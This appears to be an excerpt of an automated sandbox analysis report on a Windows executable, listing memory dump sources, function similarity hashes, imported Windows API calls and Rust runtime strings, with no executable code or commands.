                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e6f88f569e009ea383a906b11eb5c41433ef93909dce4e31778509fccc518902
                                      • Instruction ID: 025da28ff063d63275b6a28c929ad5888eb98e1b83e26832173b6047be9c4b51
                                      • Opcode Fuzzy Hash: e6f88f569e009ea383a906b11eb5c41433ef93909dce4e31778509fccc518902
                                      • Instruction Fuzzy Hash: 9C5125B3B25B34452A00DFA2BE20C676A50F75CBD4B4A7815EE8C97B45CE3CCA95E304
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7c491594b5c1d11b06ea3c1f24ede35a1ac1d72a7a81866782b57f956aac49e7
                                      • Instruction ID: 76f09a74a532eca96d00b4f29785c6379b45e5db180f394620cee93d90c90df5
                                      • Opcode Fuzzy Hash: 7c491594b5c1d11b06ea3c1f24ede35a1ac1d72a7a81866782b57f956aac49e7
                                      • Instruction Fuzzy Hash: 96513AA3B19B30456A00CFA1BD21C676A50F758FD4F4A7825EF8C97B45CE3CCA91E200
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f9c32496ecfd97439d2b4d119587a6c7a3004efda628f329c2840494c36d5e67
                                      • Instruction ID: 1f6f754917f5495db1b4beb9665ac33c98be099d974f938e923ee48b84d20b29
                                      • Opcode Fuzzy Hash: f9c32496ecfd97439d2b4d119587a6c7a3004efda628f329c2840494c36d5e67
                                      • Instruction Fuzzy Hash: 8B413463716B188A7A50DFA2BE60567A691B71CBC4F4DB832EE4C87704CE3CD6829240
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0f9bf80d8afecc9da5a1a7b24e139040353467d58a90821988d65bf6b54f1471
                                      • Instruction ID: 049e346f6864221e09c5c86e180e9107f9902f3dba61b4e16d44fb6a0afc068e
                                      • Opcode Fuzzy Hash: 0f9bf80d8afecc9da5a1a7b24e139040353467d58a90821988d65bf6b54f1471
                                      • Instruction Fuzzy Hash: B8514EA9D15FC942F313663C54032B2E3285FFB199E51E307FDD0B9E26C791AB4AA214
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 30085b4081cdce905a621a0b67a6044b82c834c657b575b8f304bbe6d0fe82ad
                                      • Instruction ID: a987edc3ead5c74a6f46633260b01e69b30b33f62d5e17eac598f8325ea77f4f
                                      • Opcode Fuzzy Hash: 30085b4081cdce905a621a0b67a6044b82c834c657b575b8f304bbe6d0fe82ad
                                      • Instruction Fuzzy Hash: 76412772F046A542FA54DF56EAA0ABCB651E390BD4F81A037CD1E63B84CE3CD956C380
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cd501bcd0fca7d58818bfe5b4041dd28b983f2d4f86e83acaaf1f1446665f536
                                      • Instruction ID: 0e938c0dcc93ea2e8698c7c8b6fa9b1c089d274af027e0945c0b23b6add3398b
                                      • Opcode Fuzzy Hash: cd501bcd0fca7d58818bfe5b4041dd28b983f2d4f86e83acaaf1f1446665f536
                                      • Instruction Fuzzy Hash: B341D623B0D68245EB29DF5AD09177DAF91A7A0780FC5853FCA4E27680EE3DD448CB21
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2f140545ccbb1525e7f329287da5d11cb7888fdce5abd42ef7b2c71986febe68
                                      • Instruction ID: 0a132502d8427d6093ba1c1b3b6086541e72c448b30e985eb8d4a959f82091ac
                                      • Opcode Fuzzy Hash: 2f140545ccbb1525e7f329287da5d11cb7888fdce5abd42ef7b2c71986febe68
                                      • Instruction Fuzzy Hash: 1E31B9E5B18FC142FE40EBA9746637B9311A7857D0F80E236DE8D6A70ADF2ED1428244
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2796ec57537121fd8b622c319fe21d7ab3bc50e34897546efa2265c3a097e548
                                      • Instruction ID: 9ae59175facd26f2b632c4980c1aa7571bc1eaebce3dc7fc7d5f21192d083681
                                      • Opcode Fuzzy Hash: 2796ec57537121fd8b622c319fe21d7ab3bc50e34897546efa2265c3a097e548
                                      • Instruction Fuzzy Hash: DE31D8E6B18FC042FE40E7A9746737B9311A7853D0F80E236DE8D6A60BDF2DD1428244
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4af982ac453bbedf6d4f96f0524be61fbbb53de5fcff856ddf31ea94f00c68a3
                                      • Instruction ID: 1ca847d6c601332ac85921c3bfa0f6c07413964da0d58dc0ffe3526046f8c3d8
                                      • Opcode Fuzzy Hash: 4af982ac453bbedf6d4f96f0524be61fbbb53de5fcff856ddf31ea94f00c68a3
                                      • Instruction Fuzzy Hash: 0C31C733B0D2C245EF69DE5AD0A177D6E905760780FC9893FCA5E17280ED2D9449CB31
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 139fcc1d29d5164657fec0e5ebe7fb8d097fce3a6ea25197e54d9d4acd5e8263
                                      • Instruction ID: d9daa129e953b7373f4eb04363bcb6c9b9285a509f793e98b75535023245afcb
                                      • Opcode Fuzzy Hash: 139fcc1d29d5164657fec0e5ebe7fb8d097fce3a6ea25197e54d9d4acd5e8263
                                      • Instruction Fuzzy Hash: CAA0012190885291FA08BF2AE991078AA31AB50302BC1027AC10D615A4AE6CA540A361
                                      APIs
                                      • WaitForSingleObjectEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF7D434BCF8
                                      • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF7D434BD11
                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF7D434BD4A
                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF7D434BD82
                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF7D434BDBB
                                      • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF7D434BDD4
                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF7D434BE12
                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF7D434BE6C
                                      • CreateMutexA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF7D434BEFE
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF7D434BF23
                                      • ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF7D434BF69
                                      • ReleaseMutex.KERNEL32(?,?,?,?,?), ref: 00007FF7D434C01E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmp
                                      Similarity
                                      • API ID: AddressProc$Mutex$CurrentProcessRelease$CloseCreateHandleLibraryLoadObjectSingleWait
                                      • String ID: SymAddrIncludeInlineTrace$SymGetOptions$SymInitializeW$SymSetOptions$called `Option::unwrap()` on a `None` value/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\io\borrowed_buf.rs/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\alloc\src\collections\btree\navigate.rs$dbghelp.dll
                                      • API String ID: 2119853198-2283261341
                                      • Opcode ID: 4b2c1fc9ce42c7ae5ebe4485f88a3dde7baefa0ee0026cf6fe2f04af51483210
                                      • Instruction ID: 0d38f441c8cd5c7d0a59887375f664c6d65d19b0b7eab7444a409de1877d6378
                                      • Opcode Fuzzy Hash: 4b2c1fc9ce42c7ae5ebe4485f88a3dde7baefa0ee0026cf6fe2f04af51483210
                                      • Instruction Fuzzy Hash: C7A1C121A09A5295FB14AF2FEC803BCA7A0BF45B54FC4513AD99D666A0DF3CE185C730
                                      APIs
                                      Strings
                                      • failed to spawn thread, xrefs: 00007FF7D43490A4
                                      • /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs, xrefs: 00007FF7D43490E4
                                      • cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs, xrefs: 00007FF7D434911C
                                      Similarity
                                      • API ID: Handle$CurrentDuplicateProcess$CloseErrorLast
                                      • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs$cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs$failed to spawn thread
                                      • API String ID: 120317985-263981136
                                      • Opcode ID: f3595bf2b31cfea6e23347fd63f60a5d7f440528f5d008c8782841e6d9b50d3a
                                      • Instruction ID: bc7dfb5979da6e1002349142c432f6d958064cf48e561e0ae6d4cc1003ed9e91
                                      • Opcode Fuzzy Hash: f3595bf2b31cfea6e23347fd63f60a5d7f440528f5d008c8782841e6d9b50d3a
                                      • Instruction Fuzzy Hash: 25C18022A09B8189E715AF3AD8843ED77A0FB54748FD4413AEA8D13B95DF3DE494C360
                                      APIs
                                      • memset.VCRUNTIME140(00000001,?,?,?,?,00000000,?,?,00007FF7D4326713), ref: 00007FF7D4331124
                                      • memmove.VCRUNTIME140(00000001,?,?,?,?,00000000,?,?,00007FF7D4326713), ref: 00007FF7D433114A
                                      • memmove.VCRUNTIME140(00000001,?,?,?,?,00000000,?,?,00007FF7D4326713), ref: 00007FF7D43311C5
                                      • memmove.VCRUNTIME140(00000001,?,?,?,?,00000000,?,?,00007FF7D4326713), ref: 00007FF7D43311DA
                                      • memmove.VCRUNTIME140(00000001,?,?,?,?,00000000,?,?,00007FF7D4326713), ref: 00007FF7D4331210
                                      • memmove.VCRUNTIME140(00000001,?,?,?,?,00000000,?,?,00007FF7D4326713), ref: 00007FF7D4331231
                                      • memmove.VCRUNTIME140(00000001,?,?,?,?,00000000,?,?,00007FF7D4326713), ref: 00007FF7D4331358
                                      Strings
                                      Similarity
                                      • API ID: memmove$memset
                                      • String ID: assertion failed: n <= bs
                                      • API String ID: 3790616698-2139787691
                                      • Opcode ID: 1b3127f00a3030e7e3460ab684fe8014dd420f783fe365a7cc107eb72fc79516
                                      • Instruction ID: 71d879051ad5ea831038dfd7ce4230cc294c509b106c7065d0d065b0c112abed
                                      • Opcode Fuzzy Hash: 1b3127f00a3030e7e3460ab684fe8014dd420f783fe365a7cc107eb72fc79516
                                      • Instruction Fuzzy Hash: 0781E322E0869695EB20BF2AD8952EDA754BF457A4FC04237ED9C5B7C5CE3CD642C320
                                      APIs
                                      Similarity
                                      • API ID: CloseHandle$FileSleep$ErrorLastReadWritememset
                                      • String ID:
                                      • API String ID: 3673338832-0
                                      • Opcode ID: 2229b28413a99fa0d821bd83a9e28f30ab5c7d6d307353ba698ae4c13c8db627
                                      • Instruction ID: 7e653d696fea28415bd00ca473b3c28bf52feba3880dd395cb44fec135cd2f41
                                      • Opcode Fuzzy Hash: 2229b28413a99fa0d821bd83a9e28f30ab5c7d6d307353ba698ae4c13c8db627
                                      • Instruction Fuzzy Hash: 81513E22604AC694E731AF2AEC457FD6760FB44798F84413AED5C1BB98DF789286D310
                                      APIs
                                      Similarity
                                      • API ID: ErrorLast$FullNamePathmemcmpmemmove
                                      • String ID:
                                      • API String ID: 2319842497-0
                                      • Opcode ID: cf7ad302de7728fc650c73c33ae6d099592146cabde4fb3e650b8427a8ac7eea
                                      • Instruction ID: 02406df6b09d98d2c211d30470c155336f07c70e79873b13e3c4049ac5c8cc14
                                      • Opcode Fuzzy Hash: cf7ad302de7728fc650c73c33ae6d099592146cabde4fb3e650b8427a8ac7eea
                                      • Instruction Fuzzy Hash: 3EB18162A04BC286EB75AF2ADC843EDA754FB44B98FC4413ADE5D6B785DF38D2418310
                                      APIs
                                      Similarity
                                      • API ID: ErrorLast$FullNamePathmemcmp
                                      • String ID:
                                      • API String ID: 2929619185-0
                                      • Opcode ID: 2a533ef179a7183f35ae18e143f62a954d9cc98c63aa3ade5495b0ccec5ecdf9
                                      • Instruction ID: cf92fdc2653494544215d091958982894ca423411902b98803119bcd528489bb
                                      • Opcode Fuzzy Hash: 2a533ef179a7183f35ae18e143f62a954d9cc98c63aa3ade5495b0ccec5ecdf9
                                      • Instruction Fuzzy Hash: 4CB16062A04BC285EB75AF2ADD843EDA759FB04B98FD0413ADE5C6B785DF38D2418310
                                      APIs
                                      Strings
                                      • assertion failed: self.is_char_boundary(new_len)/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\alloc\src\string.rs, xrefs: 00007FF7D4341334
                                      • NTDLL.DLL, xrefs: 00007FF7D4341008
                                      Similarity
                                      • API ID: ErrorFormatHandleLastMessageModulememset
                                      • String ID: NTDLL.DLL$assertion failed: self.is_char_boundary(new_len)/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\alloc\src\string.rs
                                      • API String ID: 1434010500-313772267
                                      • Opcode ID: 4faf0fd0c90817c6fcaca654bddc8f4c1fb2edc4ab12b504d66ec4c636cb8032
                                      • Instruction ID: 7fee54a49cd5d58fd7913d768953765fa67a501fb1adb7567805abef03619935
                                      • Opcode Fuzzy Hash: 4faf0fd0c90817c6fcaca654bddc8f4c1fb2edc4ab12b504d66ec4c636cb8032
                                      • Instruction Fuzzy Hash: B2A19432A09FC295EB319F2ADC847FCA7A0BB04384FC4413BDA9D56A95DF789685D310
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: memmove
                                      • String ID: assertion failed: old_left_len + count <= CAPACITY
                                      • API String ID: 2162964266-323339215
                                      • Opcode ID: 452feccd1db8fa0d10035c291713d94de8059aca1dfa39c42d016ee7b47553d7
                                      • Instruction ID: 2d5a7d28780fb63f4e0e9beb36e54f9200154a34774746b7bdf7aa17595bee74
                                      • Opcode Fuzzy Hash: 452feccd1db8fa0d10035c291713d94de8059aca1dfa39c42d016ee7b47553d7
                                      • Instruction Fuzzy Hash: B6A1E463A18BC582EA459F19E4453FEA364FF54B88F859336DE4D13261DF39E296C300
                                      APIs
                                      Strings
                                      • /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs, xrefs: 00007FF7D434A08E
                                      Similarity
                                      • API ID: ConsoleErrorLastWrite$ByteCharMultiWide
                                      • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs
                                      • API String ID: 1956605914-1397643090
                                      • Opcode ID: 5a122f9f142afb16b5a4d8ebf21f475bc3e017c8cc945f0c63b5290871851e56
                                      • Instruction ID: 45165381ada8725cda737bc69821b2b63efdc19878e165d025e21349145b9ef3
                                      • Opcode Fuzzy Hash: 5a122f9f142afb16b5a4d8ebf21f475bc3e017c8cc945f0c63b5290871851e56
                                      • Instruction Fuzzy Hash: 28518722A0868246F724AF2AF8843FEE651FF44780FD4413AD68D56AE5DF7CD585C720
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: AddressProc$HandleModule
                                      • String ID: WaitOnAddress$WakeByAddressSingle$api-ms-win-core-synch-l1-2-0
                                      • API String ID: 667068680-1826242509
                                      • Opcode ID: 9cb1ce57ebf45a7dd8a54e90391759f1f960326fe86313774f816689af570da8
                                      • Instruction ID: d0630b5cc5eea05542aa3ca0609f1d00d60325b3569032be3ecda023af40aa4e
                                      • Opcode Fuzzy Hash: 9cb1ce57ebf45a7dd8a54e90391759f1f960326fe86313774f816689af570da8
                                      • Instruction Fuzzy Hash: 88F03024B0A61651F909BF1FEDC517CA6B4AF44B80FC4443EC85D26354EE2CA6558320
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: lstrlenmemcmp
                                      • String ID: RUST_BACKTRACEfailed to write the buffered data$TryFromIntError:$called `Result::unwrap()` on an `Err` value
                                      • API String ID: 1799893992-2411252233
                                      • Opcode ID: 809e7a324e1954ebd168fc0d20ed88300d44aa91d385dd5efaae873b659a1ca5
                                      • Instruction ID: 0b7309b06b239cd7c909cccc07c774a5da676ed336226234eed75e6bb7182cb1
                                      • Opcode Fuzzy Hash: 809e7a324e1954ebd168fc0d20ed88300d44aa91d385dd5efaae873b659a1ca5
                                      • Instruction Fuzzy Hash: 8D81E622B04A4695EB10AF6AD4806BDB770BB447A8FD0463ADF6D23BD4DF78E545C320
                                      APIs
                                      • CreateWaitableTimerExW.KERNEL32(?,?,31786F62646E6173,?,33786F62646E6173,32786F62646E6173,00007FF7D432D8DE,?,?,?,?,?,?,00007FF7D4325140), ref: 00007FF7D4337B6A
                                      • SetWaitableTimer.KERNEL32 ref: 00007FF7D4337BC0
                                      • WaitForSingleObject.KERNEL32 ref: 00007FF7D4337BD2
                                      • CloseHandle.KERNEL32 ref: 00007FF7D4337BDD
                                      • CloseHandle.KERNEL32(?,?,31786F62646E6173,?,33786F62646E6173,32786F62646E6173,00007FF7D432D8DE,?,?,?,?,?,?,00007FF7D4325140), ref: 00007FF7D4337BED
                                      • Sleep.KERNEL32(?,?,31786F62646E6173,?,33786F62646E6173,32786F62646E6173,00007FF7D432D8DE,?,?,?,?,?,?,00007FF7D4325140), ref: 00007FF7D4337C39
                                      Similarity
                                      • API ID: CloseHandleTimerWaitable$CreateObjectSingleSleepWait
                                      • String ID:
                                      • API String ID: 2261246915-0
                                      • Opcode ID: df4b7c4e0f28b5898b2a4717a009eac63ad23da5c5733a5e467018da1cae4ee1
                                      • Instruction ID: 784dc4e45e91531efefabc0a0686e85c7ca5f2b11ab52e2201fc2cac053cea71
                                      • Opcode Fuzzy Hash: df4b7c4e0f28b5898b2a4717a009eac63ad23da5c5733a5e467018da1cae4ee1
                                      • Instruction Fuzzy Hash: 37212621B0A64642EE5CBF6AF8A973C95156B85BA0FC4833EC91F227E0DF2C64018350
                                      APIs
                                      Strings
                                      • /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs, xrefs: 00007FF7D4349DC9
                                      Similarity
                                      • API ID: Handle$CloseConsoleErrorLastMode
                                      • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs
                                      • API String ID: 1170577072-1397643090
                                      • Opcode ID: eb62733882b7c0ab55a34bfb60a3079ab1270fec595ba0a6c5474c5b93849ba0
                                      • Instruction ID: 6e2d2880eb952fe6141141f8504e8ca51397d77a34260ab9b260465a928f9e57
                                      • Opcode Fuzzy Hash: eb62733882b7c0ab55a34bfb60a3079ab1270fec595ba0a6c5474c5b93849ba0
                                      • Instruction Fuzzy Hash: AE918762A08A5294EB11EF7AE8803FCA760AB05798FC4853BDD5D276D9DF3C9185C320
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: ErrorLast$CaptureContextCurrentDirectoryEntryFunctionLookupUnwindVirtualmemset
                                      • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs
                                      • API String ID: 2744335978-1397643090
                                      • Opcode ID: 7c3477d1440f9c9d02e5db5797094c3e8b381a7f62c2a024411e651ed6f10cdf
                                      • Instruction ID: e516302a37487ab5bd85338b4b869f70b0a85198decc8deea3e040fd5806d815
                                      • Opcode Fuzzy Hash: 7c3477d1440f9c9d02e5db5797094c3e8b381a7f62c2a024411e651ed6f10cdf
                                      • Instruction Fuzzy Hash: 9DB12A62608FC18CE7719F25DC843EE77A0FB05359F84412ADA4C6BB99DF399288CB10
                                      APIs
                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,31786F62646E6173,33786F62646E6173,?,?,00007FF7D433CE9F), ref: 00007FF7D433CC46
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,31786F62646E6173,33786F62646E6173,?,?,00007FF7D433CE9F), ref: 00007FF7D433CDC4
                                      Strings
                                      Similarity
                                      • API ID: ErrorFrequencyLastPerformanceQuery
                                      • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs$called `Result::unwrap()` on an `Err` value$overflow when subtracting durations
                                      • API String ID: 3362413890-3176237871
                                      • Opcode ID: b0c4265b50fde610299b718220bcee1048d1fa352833f161786620d388aecadf
                                      • Instruction ID: 6d5502c4283320bb2f03e6f8db35d61434e9cedc21aa5bebf41837b8231a0530
                                      • Opcode Fuzzy Hash: b0c4265b50fde610299b718220bcee1048d1fa352833f161786620d388aecadf
                                      • Instruction Fuzzy Hash: 4F51E523B0864255FB14FF6ED8982BDA765AF44794FC4813BE90E23AD4DE3CA545C620
                                      APIs
                                      Strings
                                      • lock count overflow in reentrant mutexlibrary\std\src\sync\remutex.rs, xrefs: 00007FF7D433C920
                                      • called `Option::unwrap()` on a `None` value/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\io\borrowed_buf.rs/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\alloc\src\collections\btree\navigate.rs, xrefs: 00007FF7D433CA62
                                      Similarity
                                      • API ID: ExclusiveLock$Release$Acquire
                                      • String ID: called `Option::unwrap()` on a `None` value/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\io\borrowed_buf.rs/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\alloc\src\collections\btree\navigate.rs$lock count overflow in reentrant mutexlibrary\std\src\sync\remutex.rs
                                      • API String ID: 1021914862-480352821
                                      • Opcode ID: ac3503c6af596cc8bccbc3749bdf567994a8dcfa19e4d4bec1c1b5b33ab120c4
                                      • Instruction ID: 5bd7633b80bcd1a4629c0587ff0cac7c047fa03b775fa48492ba211a8beb079b
                                      • Opcode Fuzzy Hash: ac3503c6af596cc8bccbc3749bdf567994a8dcfa19e4d4bec1c1b5b33ab120c4
